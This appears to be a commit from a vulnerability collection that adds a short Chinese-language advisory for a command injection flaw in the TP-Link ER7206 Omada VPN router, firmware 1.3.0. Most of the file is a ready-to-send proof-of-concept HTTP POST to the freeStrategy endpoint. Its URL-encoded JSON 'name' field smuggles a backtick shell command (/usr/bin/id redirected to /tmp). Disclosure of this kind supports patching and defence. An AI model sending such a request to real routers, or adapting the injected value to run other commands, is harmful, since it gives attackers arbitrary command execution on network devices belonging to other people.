Create TP-Link-ER7206存在命令注入漏洞.md

2025-02-27 04:39:25 +00:00 · 2024-04-01 19:48:16 +08:00 · 2024-04-01 19:48:16 +08:00 · d1c6344c79
commit d1c6344c79
parent 7af30e14f2
1 changed files with 20 additions and 0 deletions
--- a/TP-Link-ER7206存在命令注入漏洞.md
+++ b/TP-Link-ER7206存在命令注入漏洞.md
@ -0,0 +1,20 @@
+## TP-Link-ER7206存在命令注入漏洞
+
+Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591 的访客资源功能中存在命令执行漏洞。特制的 HTTP 请求可能导致任意命令执行。攻击者可以发出经过身份验证的 HTTP 请求来触发此漏洞
+
+
+## poc
+```
+POST /cgi-bin/luci/;stok=b53d9dc12fe8aa66f4fdc273e6eaa534/admin/freeStrategy?form=strategy_list HTTP/1.1
+Host: 192.168.8.100
+User-Agent: python-requests/2.31.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Cookie: sysauth=8701fa9dc1908978bc804e7d08931706
+Content-Length: 470
+
+data=%7B%22method%22%3A%22add%22%2C%22params%22%3A%7B%22index%22%3A0%2C%22old%22%3A%22add%22%2C%22new%22%3A%7B%22name%22%3A%22DDDDL|`/usr/bin/id>/tmp/had`%22%2C%22strategy_type%22%3A%22five_tuple%22%2C%22src_ipset%22%3A%22%2F%22%2C%22dst_ipset%22%3A%22%2F%22%2C%22mac%22%3A%22%22%2C%22sport%22%3A%22-%22%2C%22dport%22%3A%22-%22%2C%22service_type%22%3A%22TCP%22%2C%22zone%22%3A%22LAN1%22%2C%22comment%22%3A%22%22%2C%22enable%22%3A%22on%22%7D%2C%22key%22%3A%22add%22%7D%7D 
+```